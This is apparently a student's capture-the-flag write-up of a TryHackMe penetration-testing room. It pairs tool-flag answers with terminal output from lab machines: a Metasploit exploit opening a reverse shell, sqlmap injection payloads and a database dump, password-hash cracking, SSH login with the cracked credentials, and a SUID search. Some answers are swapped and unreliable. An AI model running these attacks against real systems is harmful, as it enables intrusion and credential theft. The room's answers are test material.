CC: Pen Testing

Date: 16, May, 2021

Author: Dhilip Sanjay S

Click Here to go to the TryHackMe room.

Nmap (Network Utilities)

What does nmap stand for?

Answer: Network Mapper

How do you specify which port(s) to scan?

Answer: -p

How do you do a "ping scan"(just tests if the host(s) is up)?

Answer: -sn

What is the flag for a UDP scan?

Answer: -sU

How do you run default scripts?

Answer: -sC

How do you enable "aggressive mode"(Enables OS detection, version detection, script scanning, and traceroute)

Answer: -A

What flag enables OS detection

Answer: -O

How do you get the versions of services running on the target machine?

Answer: -sV

How many ports are open on the machine?

Answer: 1
Steps to Reproduce:

$ nmap -sC -sV 10.10.250.203 -oN nmap-task

Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-16 17:44 IST
Nmap scan report for 10.10.250.203
Host is up (0.15s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

What service is running on the machine?

Answer: Apache

What is the version of the service?

Answer: 2.4.18

What is the output of the http-title script(included in default scripts)

Answer: Apache2 Ubuntu Default Page: It works

Netcat (Network Utilities)

Netcat aka nc is an extremely versatile tool. It allows users to connect to specific ports and send and receive data. It also allows machines to receive data and connections on specific ports, which makes nc a very popular tool to gain a Reverse Shell.

How do you listen for connections?

Answer: -l

How do you enable verbose mode(allows you to see who connected to you)?

Answer: -v

How do you specify a port to listen on

Answer: -p

How do you specify which program to execute after you connect to a host(One of the most infamous)?

Answer: -e

How do you connect to udp ports

Answer: -u

Gobuster (Web Enumeration)

How do you specify directory/file brute forcing mode?

Answer: dir

How do you specify dns bruteforcing mode?

Answer: dns

What flag sets extensions to be used?

Answer: -x

What flag sets a wordlist to be used?

Answer: -w

How do you set the Username for basic authentication(If the directory requires a username/password)?

Answer: -U

How do you set the password for basic authentication?

Answer: -P

How do you set which status codes gobuster will interpret as valid?

Answer: -s

How do you skip ssl certificate verification?

Answer: -k

How do you specify a User-Agent?

Answer: -a

How do you specify a HTTP header?

Answer: -H

What flag sets the URL to bruteforce?

Answer: -u

What is the name of the hidden directory

Answer: secret
Steps to Reproduce:

$ gobuster dir -u http://10.10.65.181 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.65.181
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/05/16 17:50:27 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 11321]
/secret               (Status: 301) [Size: 313] [--> http://10.10.65.181/secret/]
/server-status        (Status: 403) [Size: 277]

What is the name of the hidden file with the extension xxa?

Answer: password
Steps to Reproduce:

$ gobuster dir -u http://10.10.65.181 -w /usr/share/wordlists/dirb/common.txt -x xxa
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.65.181
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              xxa
[+] Timeout:                 10s
===============================================================
2021/05/16 17:52:44 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.hta.xxa             (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess.xxa        (Status: 403) [Size: 277]
/.htpasswd.xxa        (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 11321]
/password.xxa         (Status: 200) [Size: 12]   
/secret               (Status: 301) [Size: 313] [--> http://10.10.65.181/secret/]
/server-status        (Status: 403) [Size: 277]                                  
                                                                                 
===============================================================
2021/05/16 17:55:07 Finished
===============================================================

Nikto (Web Enumeration)

How do you specify which host to use?

Answer: -h

What flag disables ssl?

Answer: -nossl

How do you force ssl?

Answer: -ssl

How do you specify authentication(username + pass)?

Answer: -id

How do you select which plugin to use?

Answer: -plugins

Which plugin checks if you can enumerate apache users?

Answer: apacheusers

nikto -list-plugins | grep apache
Plugin: apache_expect_xss
Plugin: apacheusers
  (expanded) = "ms10_070;apache_expect_xss;httpoptions;cookies;shellshock;strutshock;sitefiles;origin_reflection;clientaccesspolicy;content_search;ssl;dir_traversal;multiple_index;report_nbe;auth;msgs;headers;favicon;domino;negotiate;outdated;put_del_test;fileops;drupal;parked;report_html;dishwasher;robots;report_text;cgi;report_json;report_csv;report_sqlg;report_xml;docker_registry;tests(report:500);paths;apacheusers"
 @@ALL = "strutshock;put_del_test;multiple_index;clientaccesspolicy;report_html;embedded;report_text;siebel;cookies;drupal;sitefiles;docker_registry;tests;apache_expect_xss;report_json;domino;report_nbe;report_sqlg;favicon;fileops;dictionary;negotiate;origin_reflection;content_search;shellshock;robots;outdated;auth;apacheusers;dir_traversal;dishwasher;ssl;ms10_070;httpoptions;paths;parked;report_csv;headers;cgi;report_xml;msgs"

How do you update the plugin list?

Answer: -update

How do you list all possible plugins to use?

Answer: -list-plugins

Metasploit - Setting Up

Metasploit is one of the most popular penetration testing frameworks around. It contains a large database of almost every major CVE, which you can easily use against a machine.

What command allows you to search modules?

Answer: search

How do you select a module?

Answer: use

How do you display information about a specific module?

Answer: info

How do you list options that you can set?

Answer: options

What command lets you view advanced options for a specific module?

Answer: advanced

How do you show options in a specific category?

Answer: show

Metasploit - selecting a module

How do you select the eternalblue module?

Answer: use exploit/windows/smb/ms17_010_eternalblue

What option allows you to select the target host(s)?

Answer: RHOSTS

How do you set the target port?

Answer: RPORT

What command allows you to set options?

Answer: set

How would you set SMBPass to "username"?

Answer: set SMBPass username

How would you set the SMBUser to "password"?

Answer: set SMBUser password

What option sets the architecture to be exploited?

Answer: arch

What option sets the payload to be sent to the target machine?

Answer: payload

Once you've finished setting all the required options, how do you run the exploit?

Answer: -J

What flag do you set if you want the exploit to run in the foreground?

Answer: exploit

How do you list all current sessions?

Answer: sessions

What flag allows you to go into interactive mode with a session? ("drops you either into a meterpreter or regular shell")

Answer: -i

Metasploit - meterpreter

What command allows you to download files from the machine?

Answer: download

What command allows you to upload files to the machine?

Answer: upload

How do you list all running processes?

Answer: ps

How do you change processes on the victim host? (Ideally it will allow you to change users and gain the perms associated with that user)

Answer: migrate

What command lists files in the current directory on the remote machine?

Answer: ls

How do you execute a command on the remote host?

Answer: execute

What command starts an interactive shell on the remote host?

Answer: shell

How do you find files on the target host? (Similar function to the linux command "find")

Answer: search

How do you get the output of a file on the remote host?

Answer: cat

How do you put a meterpreter shell into "background mode"(allows you to run other msf modules while also keeping the meterpreter shell as a session)?

Answer: background

Metasploit - Final Walkthrough

Select the module that needs to be exploited

Answer: use exploit/multi/http/nostromo_code_exec

What variable do you need to set, to select the remote host?

Answer: RHOSTS

How do you set the port to 80?

Answer: set RPORT 80

How do you set listening address?

Answer: LHOST

Exploit the machine!

msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/multi/http/nostromo_code_exec
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(multi/http/nostromo_code_exec) > set RHOSTS 10.10.237.243
RHOSTS => 10.10.237.243
msf6 exploit(multi/http/nostromo_code_exec) > set rport 80
rport => 80
msf6 exploit(multi/http/nostromo_code_exec) > set LHOST 10.17.7.91
LHOST => 10.17.7.91
msf6 exploit(multi/http/nostromo_code_exec) > options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.10.237.243    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'f
                                       ile:<path>'
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an addre
                                       ss on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.17.7.91       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)


msf6 exploit(multi/http/nostromo_code_exec) > exploit

[*] Started reverse TCP handler on 10.17.7.91:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.17.7.91:4444 -> 10.10.237.243:54484) at 2021-05-16 18:26:23 +0530

shell
[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary(bash) on target machine
[*] Found bash at /bin/bash

_nostromo@ubuntu:/bin$ id    
id
uid=1001(_nostromo) gid=1001(_nostromo) groups=1001(_nostromo)

What is the name of the secret directory in the /var/nostromo/htdocs directory?

Answer: s3cretd1r

_nostromo@ubuntu:/bin$ cd /var/nostromo/htdocs
cd /var/nostromo/htdocs

_nostromo@ubuntu:/var/nostromo/htdocs$ ls -la
ls -la
total 20
drwxr-xr-x 3 _nostromo _nostromo 4096 Dec  5  2019 .
drwxr-xr-x 6 _nostromo _nostromo 4096 Dec  5  2019 ..
-rw-r--r-- 1 _nostromo _nostromo  564 Dec  5  2019 index.html
-rw-r--r-- 1 _nostromo _nostromo 1827 Dec  5  2019 nostromo.gif
drwxr-xr-x 2 root      root      4096 Dec  5  2019 s3cretd1r

What are the contents of the file inside of the directory?

Answer: Woohoo!

_nostromo@ubuntu:/var/nostromo/htdocs$ cd s3cretd1r
cd s3cretd1r

_nostromo@ubuntu:/var/nostromo/htdocs/s3cretd1r$ ls -la
ls -la
total 12
drwxr-xr-x 2 root      root      4096 Dec  5  2019 .
drwxr-xr-x 3 _nostromo _nostromo 4096 Dec  5  2019 ..
-rw-r--r-- 1 root      root         8 Dec  5  2019 nice

_nostromo@ubuntu:/var/nostromo/htdocs/s3cretd1r$ cat nice
cat nice
Woohoo!

Hashcat - Hash Cracking

What flag sets the mode?

Answer: -m

What flag sets the "attack mode"?

Answer: -a

What is the attack mode number for Brute-force?

Answer: 3

What is the mode number for SHA3-512?

Answer: 17600

Crack This Hash: 56ab24c15b72a457069c5ea42fcfc640

Answer: happy
Steps to Reproduce:
- Since it's an MD5 hash, we can use it directly without providing the -m option. Because hashcat's default option is MD5.

hashcat 56ab24c15b72a457069c5ea42fcfc640 /usr/share/wordlists/rockyou.txt 
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz, 2886/2950 MB (1024 MB allocatable), 1MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

56ab24c15b72a457069c5ea42fcfc640:happy           
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD5
Hash.Target......: 56ab24c15b72a457069c5ea42fcfc640
Time.Started.....: Sun May 16 18:36:29 2021 (0 secs)
Time.Estimated...: Sun May 16 18:36:29 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   255.2 kH/s (0.19ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 1024/14344385 (0.01%)
Rejected.........: 0/1024 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456 -> bethany

Crack this hash: 4bc9ae2b9236c2ad02d81491dcb51d5f

Answer: nootnoot
Steps to Reproduce:

hashcat -m 900 4bc9ae2b9236c2ad02d81491dcb51d5f /usr/share/wordlists/rockyou.txt 
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz, 2886/2950 MB (1024 MB allocatable), 1MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Host memory required for this attack: 64 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

4bc9ae2b9236c2ad02d81491dcb51d5f:nootnoot        
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD4
Hash.Target......: 4bc9ae2b9236c2ad02d81491dcb51d5f
Time.Started.....: Sun May 16 18:37:15 2021 (1 sec)
Time.Estimated...: Sun May 16 18:37:16 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2882.2 kH/s (0.15ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 838656/14344385 (5.85%)
Rejected.........: 0/838656 (0.00%)
Restore.Point....: 837632/14344385 (5.84%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: notsayin -> nokia_5200

JohnTheRipper - Hash Cracking

What flag let's you specify which wordlist to use?

Answer: -wordlist

What flag lets you specify which hash format(Ex: MD5,SHA1 etc.) to use?

Answer: --FORMAT

How do you specify which rule to use?

Answer: --rules

Crack this hash: 5d41402abc4b2a76b9719d911017c592

Answer:
Steps to Reproduce:

$ john -wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 john-md5.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
hello            (?)
1g 0:00:00:00 DONE (2021-05-16 18:51) 20.00g/s 7680p/s 7680c/s 7680C/s 123456..michael1
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed

Crack this hash: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

Answer: password
Steps to Reproduce:

$ john --format=raw-sha1 --wordlist=/usr/share/wordlists/rockyou.txt john-sha1.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
password         (?)
1g 0:00:00:00 DONE (2021-05-16 18:56) 50.00g/s 400.0p/s 400.0c/s 400.0C/s 123456..rockyou
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed

SQLMAP - SQL Injection

How do you specify which url to check?

Answer: -u

What about which google dork to use?

Answer: -g

How do you select(lol) which parameter to use?(Example: in the url http://ex.com?test=1 the parameter would be test.)

Answer: -p

What flag sets which database is in the target host's backend?(Example: If the flag is set to mysql then sqlmap will only test mysql injections).

Answer: --dbms

How do you select the level of depth sqlmap should use(Higher = more accurate and more tests in general).

Answer: --level

How do you dump the table entries of the database?

Answer: --dump

Which flag sets which db to enumerate?

Answer: -D

Which flag sets which table to enumerate?

Answer: -T

Which flag sets which column to enumerate?

Answer: -C

How do you ask sqlmap to try to get an interactive os-shell?

Answer: --os-shell

What flag dumps all data from every table

Answer: --dump-all

How many types of sqli is the site vulnerable to?

Answer: 3
- Type: boolean-based blind
- Type: error-based
- Type: time-based blind

What is the name of the database?

Answer: tests

How many tables are in the database?

Answer: 2
- msg
- lol

What is the value of the flag?

Answer: found_me

$ sqlmap -u http://10.10.100.239 -data="msg=hi" --dump

sqlmap -u http://10.10.100.239 -data="msg=hi" --dump
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:19:34 /2021-05-16/

[19:19:34] [INFO] testing connection to the target URL
[19:19:34] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:19:34] [INFO] testing if the target URL content is stable
[19:19:34] [INFO] target URL content is stable
[19:19:34] [INFO] testing if POST parameter 'msg' is dynamic
[19:19:35] [WARNING] POST parameter 'msg' does not appear to be dynamic
[19:19:35] [INFO] heuristic (basic) test shows that POST parameter 'msg' might be injectable (possible DBMS: 'MySQL')
[19:19:35] [INFO] heuristic (XSS) test shows that POST parameter 'msg' might be vulnerable to cross-site scripting (XSS) attacks
[19:19:35] [INFO] testing for SQL injection on POST parameter 'msg'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) Y
[19:19:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:19:44] [WARNING] reflective value(s) found and filtering out
[19:19:46] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[19:19:46] [INFO] testing 'Generic inline queries'
[19:19:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[19:19:54] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[19:20:02] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[19:20:11] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:20:12] [INFO] POST parameter 'msg' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --not-string="not")
[19:20:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:20:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[19:20:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[19:20:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[19:20:12] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[19:20:13] [INFO] POST parameter 'msg' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable 
[19:20:13] [INFO] testing 'MySQL inline queries'
[19:20:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:20:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:20:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:20:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[19:20:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[19:20:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:20:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:20:24] [INFO] POST parameter 'msg' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[19:20:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:20:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[19:20:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:20:25] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:20:26] [INFO] target URL appears to have 1 column in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
[19:20:37] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql') 
[19:20:40] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[19:20:44] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[19:20:48] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[19:20:52] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[19:20:56] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[19:20:59] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[19:21:04] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[19:21:08] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[19:21:12] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
POST parameter 'msg' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 371 HTTP(s) requests:
---
Parameter: msg (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: msg=hi' RLIKE (SELECT (CASE WHEN (9974=9974) THEN 0x6869 ELSE 0x28 END))-- reEz

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: msg=hi' AND GTID_SUBSET(CONCAT(0x7162627a71,(SELECT (ELT(4925=4925,1))),0x7176766a71),4925)-- TuQC

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: msg=hi' AND (SELECT 9956 FROM (SELECT(SLEEP(5)))MMkW)-- EgxH
---
[19:23:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 7.0.33
back-end DBMS: MySQL >= 5.6
[19:23:29] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[19:23:29] [INFO] fetching current database
[19:23:29] [INFO] retrieved: 'tests'
[19:23:29] [INFO] fetching tables for database: 'tests'
[19:23:29] [INFO] retrieved: 'lol'
[19:23:30] [INFO] retrieved: 'msg'
[19:23:30] [INFO] fetching columns for table 'msg' in database 'tests'
[19:23:30] [INFO] retrieved: 'msg'
[19:23:30] [INFO] retrieved: 'varchar(100)'
[19:23:30] [INFO] fetching entries for table 'msg' in database 'tests'
[19:23:31] [INFO] retrieved: 'msg'
[19:23:31] [INFO] retrieved: 'test'
Database: tests
Table: msg
[2 entries]
+------+
| msg  |
+------+
| msg  |
| test |
+------+

[19:23:31] [INFO] table 'tests.msg' dumped to CSV file '/root/.local/share/sqlmap/output/10.10.100.239/dump/tests/msg.csv'
[19:23:31] [INFO] fetching columns for table 'lol' in database 'tests'
[19:23:31] [INFO] retrieved: 'flag'
[19:23:31] [INFO] retrieved: 'varchar(100)'
[19:23:31] [INFO] fetching entries for table 'lol' in database 'tests'
[19:23:32] [INFO] retrieved: 'found_me'
Database: tests
Table: lol
[1 entry]
+----------+
| flag     |
+----------+
| found_me |
+----------+

[19:23:32] [INFO] table 'tests.lol' dumped to CSV file '/root/.local/share/sqlmap/output/10.10.100.239/dump/tests/lol.csv'
[19:23:32] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.100.239'

Smbmap - Samba

How do you set the username to authenticate with?

Answer: -u

What about the password?

Answer: -p

How do you set the host?

Answer: -H

What flag runs a command on the server(assuming you have permissions that is)?

Answer: -x

Answer: -s

How do you set which domain to enumerate?

Answer: -d

What flag downloads a file?

Answer: --download

What about uploading one?

Answer: --upload

Given the username "admin", the password "password", and the ip "10.10.10.10", how would you run ipconfig on that machine

Answer: smbmap -u "admin" -p "password" -H 10.10.10.10 -x "ipconfig"

Smbclient - Samba

How do you specify which domain(workgroup) to use when connecting to the host?

Answer: -w

How do you specify the ip address of the host?

Answer: -l

How do you run the command "ipconfig" on the target machine?

Answer: -c "ipconfig"

How do you specify the username to authenticate with?

Answer: -u

How do you specify the password to authenticate with?

Answer: -p

What flag is set to tell smbclient to not use a password?

Answer: -N

While in the interactive prompt, how would you download the file test, assuming it was in the current directory?

Answer: get test

In the interactive prompt, how would you upload your /etc/hosts file

Answer: put /etc/hosts

Privilege Escalation

Check the useful links

Final Exam

Nmap Enumeration

$ nmap -sC -sV 10.10.17.221 -oN nmap.out
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-16 19:52 IST
Nmap scan report for 10.10.17.221
Host is up (0.18s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 12:96:a6:1e:81:73:ae:17:4c:e1:7c:63:78:3c:71:1c (RSA)
|   256 6d:9c:f2:07:11:d2:aa:19:99:90:bb:ec:6b:a1:53:77 (ECDSA)
|_  256 0e:a5:fa:ce:f2:ad:e6:fa:99:f3:92:5f:87:bb:ba:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.17 seconds

Gobuster Enumeration of HTTP server

gobuster dir -u http://10.10.17.221 -w /usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.17.221
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/05/16 20:06:49 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/secret               (Status: 301) [Size: 313] [--> http://10.10.17.221/secret/]
/server-status        (Status: 403) [Size: 277]                                  
                                                                                 
===============================================================
2021/05/16 20:12:36 Finished
===============================================================

Gobuster enumeration of secret directory with txt extension

$ gobuster dir -x txt -w /usr/share/wordlists/dirb/common.txt -t 100 -u http://10.10.17.221/secret -b 403,404
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.17.221/secret
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt
[+] Timeout:                 10s
===============================================================
2021/05/16 20:17:19 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 0]
/secret.txt           (Status: 200) [Size: 46]
                                              
===============================================================
2021/05/16 20:17:36 Finished
===============================================================

Cracking the Hash in nyan.txt

$ john --format=raw-sha1 --wordlist=/usr/share/wordlists/rockyou.txt secret.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
nyan             (?)
1g 0:00:00:00 DONE (2021-05-16 20:20) 1.408g/s 7000Kp/s 7000Kc/s 7000KC/s nyan042077..nyamwaro
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed

user.txt

Answer: supernootnoot
Steps to Reproduce:
- Login using ssh nyan:nyan:

$ ssh nyan@10.10.17.221

The authenticity of host '10.10.17.221 (10.10.17.221)' can't be established.
ECDSA key fingerprint is SHA256:haqegvkQqmIEEzS0Mcd+NUsONboBQ6z3wQSwq+aj5Es.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.17.221' (ECDSA) to the list of known hosts.
nyan@10.10.17.221's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Last login: Sat Dec 21 08:37:54 2019

nyan@ubuntu:~$ id
uid=1000(nyan) gid=1000(nyan) groups=1000(nyan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)

nyan@ubuntu:~$ ls
user.txt

nyan@ubuntu:~$ cat user.txt
supernootnoot

Privilege Escalation - Abusing SUID

Locate the files with SUID bit set:

nyan@ubuntu:~$ find / -type f -perm /4000 2>/dev/null
/bin/mount
/bin/umount
/bin/ntfs-3g
/bin/ping6
/bin/su
/bin/ping
/bin/fusermount
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
